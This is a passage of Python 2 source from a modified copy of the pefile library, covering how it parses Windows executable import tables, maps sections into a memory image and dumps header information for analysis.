if suspicious_imports_count == len(suspicious_imports) and total_symbols < 20:
self.__warnings.append(
'Imported symbols contain entries typical of packed executables.' )
return import_descs
def parse_imports(self, original_first_thunk, first_thunk, forwarder_chain, max_length=None):
"""Parse the imported symbols.
It will fill a list, which will be available as the dictionary
attribute "imports". Its keys will be the DLL names and the values
all the symbols imported from that object.
"""
imported_symbols = []
# The following has been commented as a PE does not
# need to have the import data necessarily within
# a section, it can keep it in gaps between sections
# or overlapping other data.
#
#imports_section = self.get_section_by_rva(first_thunk)
#if not imports_section:
# raise PEFormatError, 'Invalid/corrupt imports.'
# Import Lookup Table. Contains ordinals or pointers to strings.
ilt = self.get_import_table(original_first_thunk, max_length)
# Import Address Table. May have identical content to ILT if
# PE file is not bounded, Will contain the address of the
# imported symbols once the binary is loaded or if it is already
# bound.
iat = self.get_import_table(first_thunk, max_length)
# OC Patch:
# Would crash if IAT or ILT had None type
if (not iat or len(iat)==0) and (not ilt or len(ilt)==0):
raise PEFormatError(
'Invalid Import Table information. ' +
'Both ILT and IAT appear to be broken.')
table = None
if ilt:
table = ilt
elif iat:
table = iat
else:
return None
imp_offset = 4
address_mask = 0x7fffffff
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
imp_offset = 8
address_mask = 0x7fffffffffffffffL
num_invalid = 0
for idx in xrange(len(table)):
imp_ord = None
imp_hint = None
imp_name = None
name_offset = None
hint_name_table_rva = None
if table[idx].AddressOfData:
# If imported by ordinal, we will append the ordinal number
#
if table[idx].AddressOfData & ordinal_flag:
import_by_ordinal = True
imp_ord = table[idx].AddressOfData & 0xffff
imp_name = None
name_offset = None
else:
import_by_ordinal = False
try:
hint_name_table_rva = table[idx].AddressOfData & address_mask
data = self.get_data(hint_name_table_rva, 2)
# Get the Hint
imp_hint = self.get_word_from_data(data, 0)
imp_name = self.get_string_at_rva(table[idx].AddressOfData+2)
if not is_valid_function_name(imp_name):
imp_name = '*invalid*'
name_offset = self.get_offset_from_rva(table[idx].AddressOfData+2)
except PEFormatError, e:
pass
# by nriva: we want the ThunkRVA and ThunkOffset
thunk_offset = table[idx].get_file_offset()
thunk_rva = self.get_rva_from_offset(thunk_offset)
imp_address = first_thunk + self.OPTIONAL_HEADER.ImageBase + idx * imp_offset
struct_iat = None
try:
if iat and ilt and ilt[idx].AddressOfData != iat[idx].AddressOfData:
imp_bound = iat[idx].AddressOfData
struct_iat = iat[idx]
else:
imp_bound = None
except IndexError:
imp_bound = None
# The file with hashes:
#
# MD5: bfe97192e8107d52dd7b4010d12b2924
# SHA256: 3d22f8b001423cb460811ab4f4789f277b35838d45c62ec0454c877e7c82c7f5
#
# has an invalid table built in a way that it's parseable but contains invalid
# entries that lead pefile to take extremely long amounts of time to
# parse. It also leads to extreme memory consumption.
# To prevent similar cases, if invalid entries are found in the middle of a
# table the parsing will be aborted
#
if imp_ord == None and imp_name == None:
raise PEFormatError('Invalid entries, aborting parsing.')
# Some PEs appear to interleave valid and invalid imports. Instead of
# aborting the parsing altogether we will simply skip the invalid entries.
# Although if we see 1000 invalid entries and no legit ones, we abort.
if imp_name == '*invalid*':
if num_invalid > 1000 and num_invalid == idx:
raise PEFormatError('Too many invalid names, aborting parsing.')
num_invalid += 1
continue
print imp_name
if imp_name != '' and (imp_ord or imp_name):
imported_symbols.append(
ImportData(
pe = self,
struct_table = table[idx],
struct_iat = struct_iat, # for bound imports if any
import_by_ordinal = import_by_ordinal,
ordinal = imp_ord,
ordinal_offset = table[idx].get_file_offset(),
hint = imp_hint,
name = imp_name,
name_offset = name_offset,
bound = imp_bound,
address = imp_address,
hint_name_table_rva = hint_name_table_rva,
thunk_offset = thunk_offset,
thunk_rva = thunk_rva ))
return imported_symbols
def get_import_table(self, rva, max_length=None):
table = []
# We need the ordinal flag for a simple heuristic
# we're implementing within the loop
#
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
format = self.__IMAGE_THUNK_DATA_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
format = self.__IMAGE_THUNK_DATA64_format__
MAX_ADDRESS_SPREAD = 128*2**20 # 64 MB
MAX_REPEATED_ADDRESSES = 15
repeated_address = 0
addresses_of_data_set_64 = set()
addresses_of_data_set_32 = set()
start_rva = rva
while True and rva:
if max_length is not None and rva >= start_rva+max_length:
self.__warnings.append(
'Error parsing the import table. Entries go beyond bounds.')
break
# if we see too many times the same entry we assume it could be
# a table containing bogus data (with malicious intent or otherwise)
if repeated_address >= MAX_REPEATED_ADDRESSES:
return []
# if the addresses point somewhere but the difference between the highest
# and lowest address is larger than MAX_ADDRESS_SPREAD we assume a bogus
# table as the addresses should be contained within a module
if (addresses_of_data_set_32 and
max(addresses_of_data_set_32) - min(addresses_of_data_set_32) > MAX_ADDRESS_SPREAD ):
return []
if (addresses_of_data_set_64 and
max(addresses_of_data_set_64) - min(addresses_of_data_set_64) > MAX_ADDRESS_SPREAD ):
return []
failed = False
try:
data = self.get_data(rva, Structure(format).sizeof())
except PEFormatError, e:
failed = True
if failed or len(data) != Structure(format).sizeof():
self.__warnings.append(
'Error parsing the import table. ' +
'Invalid data at RVA: 0x%x' % rva)
return None
thunk_data = self.__unpack_data__(
format, data, file_offset=self.get_offset_from_rva(rva) )
# Check if the AddressOfData lies within the range of RVAs that it's
# being scanned, abort if that is the case, as it is very unlikely
# to be legitimate data.
# Seen in PE with SHA256:
# 5945bb6f0ac879ddf61b1c284f3b8d20c06b228e75ae4f571fa87f5b9512902c
if thunk_data.AddressOfData >= start_rva and thunk_data.AddressOfData <= rva:
self.__warnings.append(
'Error parsing the import table. ' +
'AddressOfData overlaps with THUNK_DATA for ' +
'THUNK at RVA 0x%x' % ( rva ) )
break
if thunk_data and thunk_data.AddressOfData:
# If the entry looks like could be an ordinal...
if thunk_data.AddressOfData & ordinal_flag:
# but its value is beyond 2^16, we will assume it's a
# corrupted and ignore it altogether
if thunk_data.AddressOfData & 0x7fffffff > 0xffff:
return []
# and if it looks like it should be an RVA
else:
# keep track of the RVAs seen and store them to study their
# properties. When certain non-standard features are detected
# the parsing will be aborted
if (thunk_data.AddressOfData in addresses_of_data_set_32 or
thunk_data.AddressOfData in addresses_of_data_set_64):
repeated_address += 1
if thunk_data.AddressOfData >= 2**32:
addresses_of_data_set_64.add(thunk_data.AddressOfData)
else:
addresses_of_data_set_32.add(thunk_data.AddressOfData)
if not thunk_data or thunk_data.all_zeroes():
break
rva += thunk_data.sizeof()
table.append(thunk_data)
return table
def get_memory_mapped_image(self, max_virtual_address=0x10000000, ImageBase=None):
"""Returns the data corresponding to the memory layout of the PE file.
The data includes the PE header and the sections loaded at offsets
corresponding to their relative virtual addresses. (the VirtualAddress
section header member).
Any offset in this data corresponds to the absolute memory address
ImageBase+offset.
The optional argument 'max_virtual_address' provides with means of limiting
which sections are processed.
Any section with their VirtualAddress beyond this value will be skipped.
Normally, sections with values beyond this range are just there to confuse
tools. It's a common trick to see in packed executables.
If the 'ImageBase' optional argument is supplied, the file's relocations
will be applied to the image by calling the 'relocate_image()' method. Beware
that the relocation information is applied permanently.
"""
# Rebase if requested
#
if ImageBase is not None:
# Keep a copy of the image's data before modifying it by rebasing it
#
original_data = self.__data__
self.relocate_image(ImageBase)
# Collect all sections in one code block
#mapped_data = self.header
mapped_data = '' + self.__data__[:]
for section in self.sections:
# Miscellaneous integrity tests.
# Some packer will set these to bogus values to
# make tools go nuts.
#
if section.Misc_VirtualSize == 0 or section.SizeOfRawData == 0:
continue
if section.SizeOfRawData > len(self.__data__):
continue
if self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment ) > len(self.__data__):
continue
VirtualAddress_adj = self.adjust_SectionAlignment( section.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment )
if VirtualAddress_adj >= max_virtual_address:
continue
padding_length = VirtualAddress_adj - len(mapped_data)
if padding_length>0:
mapped_data += '\0'*padding_length
elif padding_length<0:
mapped_data = mapped_data[:padding_length]
mapped_data += section.get_data()
# If the image was rebased, restore it to its original form
#
if ImageBase is not None:
self.__data__ = original_data
return mapped_data
def get_resources_strings(self):
"""Returns a list of all the strings found withing the resources (if any).
This method will scan all entries in the resources directory of the PE, if
there is one, and will return a list() with the strings.
An empty list will be returned otherwise.
"""
resources_strings = list()
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
if hasattr(resource_type, 'directory'):
for resource_id in resource_type.directory.entries:
if hasattr(resource_id, 'directory'):
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
for res_string in resource_id.directory.strings.values():
resources_strings.append( res_string )
return resources_strings
def get_data(self, rva=0, length=None):
"""Get data regardless of the section where it lies on.
Given a RVA and the size of the chunk to retrieve, this method
will find the section where the data lies and return the data.
"""
s = self.get_section_by_rva(rva)
if length:
end = rva + length
else:
end = None
if not s:
if rva < len(self.header):
return self.header[rva:end]
# Before we give up we check whether the file might
# contain the data anyway. There are cases of PE files
# without sections that rely on windows loading the first
# 8291 bytes into memory and assume the data will be
# there
# A functional file with these characteristics is:
# MD5: 0008892cdfbc3bda5ce047c565e52295
# SHA-1: c7116b9ff950f86af256defb95b5d4859d4752a9
#
if rva < len(self.__data__):
return self.__data__[rva:end]
raise PEFormatError, 'data at RVA can\'t be fetched. Corrupt header?'
return s.get_data(rva, length)
def get_rva_from_offset(self, offset):
"""Get the RVA corresponding to this file offset. """
s = self.get_section_by_offset(offset)
if not s:
if self.sections:
lowest_rva = min( [ self.adjust_SectionAlignment( s.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment ) for s in self.sections] )
if offset < lowest_rva:
# We will assume that the offset lies within the headers, or
# at least points before where the earliest section starts
# and we will simply return the offset as the RVA
#
# The case illustrating this behavior can be found at:
# http://corkami.blogspot.com/2010/01/hey-hey-hey-whats-in-your-head.html
# where the import table is not contained by any section
# hence the RVA needs to be resolved to a raw offset
return offset
# bug here.. falls through
else:
return offset
#raise PEFormatError("specified offset (0x%x) doesn't belong to any section." % offset)
return s.get_rva_from_offset(offset)
def get_offset_from_rva(self, rva):
"""Get the file offset corresponding to this RVA.
Given a RVA , this method will find the section where the
data lies and return the offset within the file.
"""
s = self.get_section_by_rva(rva)
if not s:
# If not found within a section assume it might
# point to overlay data or otherwise data present
# but not contained in any section. In those
# cases the RVA should equal the offset
if rva<len(self.__data__):
return rva
raise PEFormatError, 'data at RVA can\'t be fetched. Corrupt header?'
return s.get_offset_from_rva(rva)
def get_string_at_rva(self, rva):
"""Get an ASCII string located at the given address."""
if rva is None:
return None
s = self.get_section_by_rva(rva)
if not s:
return self.get_string_from_data(0, self.__data__[rva:rva+MAX_STRING_LENGTH])
return self.get_string_from_data( 0, s.get_data(rva, length=MAX_STRING_LENGTH) )
def get_string_from_data(self, offset, data):
"""Get an ASCII string from within the data."""
# OC Patch
b = None
try:
b = data[offset]
except IndexError:
return ''
s = ''
while ord(b):
s += b
offset += 1
try:
b = data[offset]
except IndexError:
break
return s
def get_string_u_at_rva(self, rva, max_length = 2**16):
"""Get an Unicode string located at the given address."""
try:
# If the RVA is invalid all would blow up. Some EXEs seem to be
# specially nasty and have an invalid RVA.
data = self.get_data(rva, 2)
except PEFormatError, e:
return None
s = u''
for idx in xrange(max_length):
try:
uchr = struct.unpack('<H', self.get_data(rva+2*idx, 2))[0]
except struct.error:
break
if unichr(uchr) == u'\0':
break
s += unichr(uchr)
return s
def get_section_by_offset(self, offset):
"""Get the section containing the given file offset."""
sections = [s for s in self.sections if s.contains_offset(offset)]
if sections:
return sections[0]
return None
def get_section_by_rva(self, rva):
"""Get the section containing the given address."""
sections = [s for s in self.sections if s.contains_rva(rva)]
if sections:
return sections[0]
return None
def __str__(self):
return self.dump_info()
def print_info(self):
"""Print all the PE header information in a human readable from."""
print self.dump_info()
def dump_info(self, dump=None):
"""Dump all the PE header information into human readable string."""
if dump is None:
dump = Dump()
warnings = self.get_warnings()
if warnings:
dump.add_header('Parsing Warnings')
for warning in warnings:
dump.add_line(warning)
dump.add_newline()
dump.add_header('DOS_HEADER')
dump.add_lines(self.DOS_HEADER.dump())
dump.add_newline()
dump.add_header('NT_HEADERS')
dump.add_lines(self.NT_HEADERS.dump())
dump.add_newline()
dump.add_header('FILE_HEADER')
dump.add_lines(self.FILE_HEADER.dump())
image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
dump.add('Flags: ')
flags = []
for flag in image_flags:
if getattr(self.FILE_HEADER, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_newline()
if hasattr(self, 'OPTIONAL_HEADER') and self.OPTIONAL_HEADER is not None:
dump.add_header('OPTIONAL_HEADER')
dump.add_lines(self.OPTIONAL_HEADER.dump())
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
dump.add('DllCharacteristics: ')
flags = []
for flag in dll_characteristics_flags:
if getattr(self.OPTIONAL_HEADER, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_newline()
dump.add_header('PE Sections')
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
for section in self.sections:
dump.add_lines(section.dump())
dump.add('Flags: ')
flags = []
for flag in section_flags:
if getattr(section, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_line('Entropy: %f (Min=0.0, Max=8.0)' % section.get_entropy() )
if md5 is not None:
dump.add_line('MD5 hash: %s' % section.get_hash_md5() )
if sha1 is not None:
dump.add_line('SHA-1 hash: %s' % section.get_hash_sha1() )
if sha256 is not None:
dump.add_line('SHA-256 hash: %s' % section.get_hash_sha256() )
if sha512 is not None:
dump.add_line('SHA-512 hash: %s' % section.get_hash_sha512() )
dump.add_newline()
if (hasattr(self, 'OPTIONAL_HEADER') and
hasattr(self.OPTIONAL_HEADER, 'DATA_DIRECTORY') ):
dump.add_header('Directories')
for idx in xrange(len(self.OPTIONAL_HEADER.DATA_DIRECTORY)):
directory = self.OPTIONAL_HEADER.DATA_DIRECTORY[idx]
dump.add_lines(directory.dump())
dump.add_newline()
def convert_char(char):
if char in string.ascii_letters or char in string.digits or char in string.punctuation or char in string.whitespace:
return char
else:
return r'\x%02x' % ord(char)
def convert_to_printable(s):
return ''.join([convert_char(c) for c in s])
if hasattr(self, 'VS_VERSIONINFO'):
dump.add_header('Version Information')
dump.add_lines(self.VS_VERSIONINFO.dump())
dump.add_newline()
if hasattr(self, 'VS_FIXEDFILEINFO'):
dump.add_lines(self.VS_FIXEDFILEINFO.dump())
dump.add_newline()
if hasattr(self, 'FileInfo'):
for entry in self.FileInfo:
dump.add_lines(entry.dump())
dump.add_newline()
if hasattr(entry, 'StringTable'):
for st_entry in entry.StringTable:
[dump.add_line(' '+line) for line in st_entry.dump()]
dump.add_line(' LangID: '+st_entry.LangID)
dump.add_newline()
for str_entry in st_entry.entries.items():
dump.add_line( ' ' +
convert_to_printable(str_entry[0]) + ': ' +
convert_to_printable(str_entry[1]) )
dump.add_newline()
elif hasattr(entry, 'Var'):
for var_entry in entry.Var:
if hasattr(var_entry, 'entry'):
[dump.add_line(' '+line) for line in var_entry.dump()]
dump.add_line(
' ' +
convert_to_printable(var_entry.entry.keys()[0]) +
': ' + var_entry.entry.values()[0])
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_EXPORT'):
dump.add_header('Exported symbols')
dump.add_lines(self.DIRECTORY_ENTRY_EXPORT.struct.dump())
dump.add_newline()
dump.add_line('%-10s %-10s %s' % ('Ordinal', 'RVA', 'Name'))
for export in self.DIRECTORY_ENTRY_EXPORT.symbols:
if export.address is not None:
dump.add('%-10d 0x%08Xh %s' % (
export.ordinal, export.address, export.name))
if export.forwarder:
dump.add_line(' forwarder: %s' % export.forwarder)
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
dump.add_header('Imported symbols')
for module in self.DIRECTORY_ENTRY_IMPORT:
dump.add_lines(module.struct.dump())
dump.add_newline()
for symbol in module.imports:
if symbol.import_by_ordinal is True:
if symbol.name is not None:
dump.add('%s.%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, symbol.name, str(symbol.ordinal)))
else:
dump.add('%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, str(symbol.ordinal)))
else:
dump.add('%s.%s Hint[%s]' % (
module.dll, symbol.name, str(symbol.hint)))
if symbol.bound:
dump.add_line(' Bound: 0x%08X' % (symbol.bound))
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_BOUND_IMPORT'):
dump.add_header('Bound imports')
for bound_imp_desc in self.DIRECTORY_ENTRY_BOUND_IMPORT:
dump.add_lines(bound_imp_desc.struct.dump())
dump.add_line('DLL: %s' % bound_imp_desc.name)
dump.add_newline()
for bound_imp_ref in bound_imp_desc.entries:
dump.add_lines(bound_imp_ref.struct.dump(), 4)
dump.add_line('DLL: %s' % bound_imp_ref.name, 4)
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_DELAY_IMPORT'):
dump.add_header('Delay Imported symbols')
for module in self.DIRECTORY_ENTRY_DELAY_IMPORT:
dump.add_lines(module.struct.dump())
dump.add_newline()
for symbol in module.imports:
if symbol.import_by_ordinal is True:
dump.add('%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, str(symbol.ordinal)))
else:
dump.add('%s.%s Hint[%s]' % (
module.dll, symbol.name, str(symbol.hint)))
if symbol.bound:
dump.add_line(' Bound: 0x%08X' % (symbol.bound))
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
dump.add_header('Resource directory')
dump.add_lines(self.DIRECTORY_ENTRY_RESOURCE.struct.dump())
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
if resource_type.name is not None:
dump.add_line('Name: [%s]' % resource_type.name, 2)
else:
dump.add_line('Id: [0x%X] (%s)' % (
resource_type.struct.Id, RESOURCE_TYPE.get(
resource_type.struct.Id, '-')),
2)
dump.add_lines(resource_type.struct.dump(), 2)
if hasattr(resource_type, 'directory'):
dump.add_lines(resource_type.directory.struct.dump(), 4)
for resource_id in resource_type.directory.entries:
if resource_id.name is not None:
dump.add_line('Name: [%s]' % resource_id.name, 6)
else:
dump.add_line('Id: [0x%X]' % resource_id.struct.Id, 6)
dump.add_lines(resource_id.struct.dump(), 6)
if hasattr(resource_id, 'directory'):
dump.add_lines(resource_id.directory.struct.dump(), 8)
for resource_lang in resource_id.directory.entries:
if hasattr(resource_lang, 'data'):
dump.add_line('\\--- LANG [%d,%d][%s,%s]' % (
resource_lang.data.lang,
resource_lang.data.sublang,
LANG.get(resource_lang.data.lang, '*unknown*'),
get_sublang_name_for_lang( resource_lang.data.lang, resource_lang.data.sublang ) ), 8)
dump.add_lines(resource_lang.struct.dump(), 10)
dump.add_lines(resource_lang.data.struct.dump(), 12)
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
dump.add_line( '[STRINGS]' , 10 )
for idx, res_string in resource_id.directory.strings.items():
dump.add_line( '%6d: %s' % (idx, convert_to_printable(res_string) ), 12 )
dump.add_newline()
dump.add_newline()
if ( hasattr(self, 'DIRECTORY_ENTRY_TLS') and
self.DIRECTORY_ENTRY_TLS and
self.DIRECTORY_ENTRY_TLS.struct ):
dump.add_header('TLS')
dump.add_lines(self.DIRECTORY_ENTRY_TLS.struct.dump())
dump.add_newline()
if ( hasattr(self, 'DIRECTORY_ENTRY_LOAD_CONFIG') and
self.DIRECTORY_ENTRY_LOAD_CONFIG and
self.DIRECTORY_ENTRY_LOAD_CONFIG.struct ):
dump.add_header('LOAD_CONFIG')
dump.add_lines(self.DIRECTORY_ENTRY_LOAD_CONFIG.struct.dump())
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_DEBUG'):
dump.add_header('Debug information')
for dbg in self.DIRECTORY_ENTRY_DEBUG:
dump.add_lines(dbg.struct.dump())
try:
dump.add_line('Type: '+DEBUG_TYPE[dbg.struct.Type])
except KeyError:
dump.add_line('Type: 0x%x(Unknown)' % dbg.struct.Type)
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_BASERELOC'):
dump.add_header('Base relocations')
for base_reloc in self.DIRECTORY_ENTRY_BASERELOC:
dump.add_lines(base_reloc.struct.dump())
for reloc in base_reloc.entries:
try:
dump.add_line('%08Xh %s' % (
reloc.rva, RELOCATION_TYPE[reloc.type][16:]), 4)
except KeyError:
dump.add_line('0x%08X 0x%x(Unknown)' % (
reloc.rva, reloc.type), 4)
dump.add_newline()
return dump.get_text()
def dump_dict(self, dump=None):
"""Dump all the PE header information into a dictionary."""
dump_dict = dict()
warnings = self.get_warnings()
if warnings:
dump_dict['Parsing Warnings'] = warnings
dump_dict['DOS_HEADER'] = self.DOS_HEADER.dump_dict()
dump_dict['NT_HEADERS'] = self.NT_HEADERS.dump_dict()
dump_dict['FILE_HEADER'] = self.FILE_HEADER.dump_dict()
image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
dump_dict['Flags'] = list()
for flag in image_flags:
if getattr(self.FILE_HEADER, flag[0]):
dump_dict['Flags'].append(flag[0])
if hasattr(self, 'OPTIONAL_HEADER') and self.OPTIONAL_HEADER is not None:
dump_dict['OPTIONAL_HEADER'] = self.OPTIONAL_HEADER.dump_dict()
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
dump_dict['DllCharacteristics'] = list()
for flag in dll_characteristics_flags:
if getattr(self.OPTIONAL_HEADER, flag[0]):
dump_dict['DllCharacteristics'].append(flag[0])
dump_dict['PE Sections'] = list()
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
for section in self.sections:
section_dict = section.dump_dict()
dump_dict['PE Sections'].append(section_dict)
section_dict['Flags'] = list()
for flag in section_flags:
if getattr(section, flag[0]):
section_dict['Flags'].append(flag[0])
section_dict['Entropy'] = section.get_entropy()
if md5 is not None:
section_dict['MD5'] = section.get_hash_md5()
if sha1 is not None:
section_dict['SHA1'] = section.get_hash_sha1()
if sha256 is not None:
section_dict['SHA256'] = section.get_hash_sha256()
if sha512 is not None:
section_dict['SHA512'] = section.get_hash_sha512()
if (hasattr(self, 'OPTIONAL_HEADER') and
hasattr(self.OPTIONAL_HEADER, 'DATA_DIRECTORY') ):
dump_dict['Directories'] = list()
for idx in xrange(len(self.OPTIONAL_HEADER.DATA_DIRECTORY)):
directory = self.OPTIONAL_HEADER.DATA_DIRECTORY[idx]
dump_dict['Directories'].append(directory.dump_dict())
def convert_char(char):
if char in string.ascii_letters or char in string.digits or char in string.punctuation or char in string.whitespace:
return char
else:
return r'\x%02x' % ord(char)
def convert_to_printable(s):
return ''.join([convert_char(c) for c in s])
if hasattr(self, 'VS_VERSIONINFO'):
dump_dict['Version Information'] = list()
dump_dict['Version Information'].append(self.VS_VERSIONINFO.dump_dict())
if hasattr(self, 'VS_FIXEDFILEINFO'):
dump_dict['Version Information'].append(self.VS_FIXEDFILEINFO.dump_dict())
if hasattr(self, 'FileInfo'):
fileinfo_list = list()
for entry in self.FileInfo:
fileinfo_list.append(entry.dump_dict())
if hasattr(entry, 'StringTable'):
stringtable_dict = dict()
for st_entry in entry.StringTable:
[fileinfo_list.append(line) for line in st_entry.dump_dict()]
stringtable_dict['LangID'] = st_entry.LangID
for str_entry in st_entry.entries.items():
stringtable_dict[convert_to_printable(str_entry[0])] = convert_to_printable(str_entry[1])
fileinfo_list.append(stringtable_dict)
elif hasattr(entry, 'Var'):
for var_entry in entry.Var:
var_dict = dict()
if hasattr(var_entry, 'entry'):
[fileinfo_list.append(line) for line in var_entry.dump_dict()]
var_dict[convert_to_printable(var_entry.entry.keys()[0])] = var_entry.entry.values()[0]
fileinfo_list.append(var_dict)
if hasattr(self, 'DIRECTORY_ENTRY_EXPORT'):
dump_dict['Exported symbols'] = list()
dump_dict['Exported symbols'].append(self.DIRECTORY_ENTRY_EXPORT.struct.dump_dict())
for export in self.DIRECTORY_ENTRY_EXPORT.symbols:
export_dict = dict()
if export.address is not None:
export_dict.update({'Ordinal': export.ordinal, 'RVA': export.address, 'Name': export.name})
if export.forwarder:
export_dict['forwarder'] = export.forwarder
dump_dict['Exported symbols'].append(export_dict)
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
dump_dict['Imported symbols'] = list()
for module in self.DIRECTORY_ENTRY_IMPORT:
import_list = list()
dump_dict['Imported symbols'].append(import_list)
import_list.append(module.struct.dump_dict())
for symbol in module.imports:
symbol_dict = dict()
if symbol.import_by_ordinal is True:
symbol_dict['DLL'] = module.dll
symbol_dict['Ordinal'] = symbol.ordinal
else:
symbol_dict['DLL'] = module.dll
symbol_dict['Name'] = symbol.name
symbol_dict['Hint'] = symbol.hint
if symbol.bound:
symbol_dict['Bound'] = symbol.bound
import_list.append(symbol_dict)
if hasattr(self, 'DIRECTORY_ENTRY_BOUND_IMPORT'):
dump_dict['Bound imports'] = list()
for bound_imp_desc in self.DIRECTORY_ENTRY_BOUND_IMPORT:
bound_imp_desc_dict = dict()
dump_dict['Bound imports'].append(bound_imp_desc_dict)
bound_imp_desc_dict.update(bound_imp_desc.struct.dump_dict())
bound_imp_desc_dict['DLL'] = bound_imp_desc.name
for bound_imp_ref in bound_imp_desc.entries:
bound_imp_ref_dict = dict()
bound_imp_ref_dict.update(bound_imp_ref.struct.dump_dict())
bound_imp_ref_dict['DLL'] = bound_imp_ref.name
if hasattr(self, 'DIRECTORY_ENTRY_DELAY_IMPORT'):
dump_dict['Delay Imported symbols'] = list()
for module in self.DIRECTORY_ENTRY_DELAY_IMPORT:
module_list = list()
dump_dict['Delay Imported symbols'].append(module_list)
module_list.append(module.struct.dump_dict())
for symbol in module.imports:
symbol_dict = dict()
if symbol.import_by_ordinal is True:
symbol_dict['DLL'] = module.dll
symbol_dict['Ordinal'] = symbol.ordinal
else:
symbol_dict['DLL'] = module.dll
symbol_dict['Name'] = symbol.name
symbol_dict['Hint'] = symbol.hint
if symbol.bound:
symbol_dict['Bound'] = symbol.bound
module_list.append(symbol_dict)
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
dump_dict['Resource directory'] = list()
dump_dict['Resource directory'].append(self.DIRECTORY_ENTRY_RESOURCE.struct.dump_dict())
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
resource_type_dict = dict()
if resource_type.name is not None:
resource_type_dict['Name'] = resource_type.name
else:
resource_type_dict['Id'] = (
resource_type.struct.Id, RESOURCE_TYPE.get(resource_type.struct.Id, '-'))
resource_type_dict.update(resource_type.struct.dump_dict())
dump_dict['Resource directory'].append(resource_type_dict)
if hasattr(resource_type, 'directory'):
directory_list = list()
directory_list.append(resource_type.directory.struct.dump_dict())
dump_dict['Resource directory'].append(directory_list)
for resource_id in resource_type.directory.entries:
resource_id_dict = dict()
if resource_id.name is not None:
resource_id_dict['Name'] = resource_id.name
else:
resource_id_dict['Id'] = resource_id.struct.Id
resource_id_dict.update(resource_id.struct.dump_dict())
directory_list.append(resource_id_dict)
if hasattr(resource_id, 'directory'):
resource_id_list = list()
resource_id_list.append(resource_id.directory.struct.dump_dict())
directory_list.append(resource_id_list)
for resource_lang in resource_id.directory.entries:
if hasattr(resource_lang, 'data'):
resource_lang_dict = dict()
resource_lang_dict['LANG'] = resource_lang.data.lang
resource_lang_dict['SUBLANG'] = resource_lang.data.sublang
resource_lang_dict['LANG_NAME'] = LANG.get(resource_lang.data.lang, '*unknown*')
resource_lang_dict['SUBLANG_NAME'] = get_sublang_name_for_lang(resource_lang.data.lang, resource_lang.data.sublang)
resource_lang_dict.update(resource_lang.struct.dump_dict())
resource_lang_dict.update(resource_lang.data.struct.dump_dict())
resource_id_list.append(resource_lang_dict)
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
for idx, res_string in resource_id.directory.strings.items():
resource_id_list.append(convert_to_printable(res_string))
if ( hasattr(self, 'DIRECTORY_ENTRY_TLS') and
self.DIRECTORY_ENTRY_TLS and
self.DIRECTORY_ENTRY_TLS.struct ):
dump_dict['TLS'] = self.DIRECTORY_ENTRY_TLS.struct.dump_dict()
if ( hasattr(self, 'DIRECTORY_ENTRY_LOAD_CONFIG') and
self.DIRECTORY_ENTRY_LOAD_CONFIG and
self.DIRECTORY_ENTRY_LOAD_CONFIG.struct ):
dump_dict['LOAD_CONFIG'] = self.DIRECTORY_ENTRY_LOAD_CONFIG.struct.dump_dict()
if hasattr(self, 'DIRECTORY_ENTRY_DEBUG'):
dump_dict['Debug information'] = list()
for dbg in self.DIRECTORY_ENTRY_DEBUG:
dbg_dict = dict()
dump_dict['Debug information'].append(dbg_dict)
dbg_dict.update(dbg.struct.dump_dict())
dbg_dict['Type'] = DEBUG_TYPE.get(dbg.struct.Type, dbg.struct.Type)
if hasattr(self, 'DIRECTORY_ENTRY_BASERELOC'):
dump_dict['Base relocations'] = list()
for base_reloc in self.DIRECTORY_ENTRY_BASERELOC:
base_reloc_list = list()
dump_dict['Base relocations'].append(base_reloc_list)
base_reloc_list.append(base_reloc.struct.dump_dict())
for reloc in base_reloc.entries:
reloc_dict = dict()
base_reloc_list.append(reloc_dict)
reloc_dict['RVA'] = reloc.rva
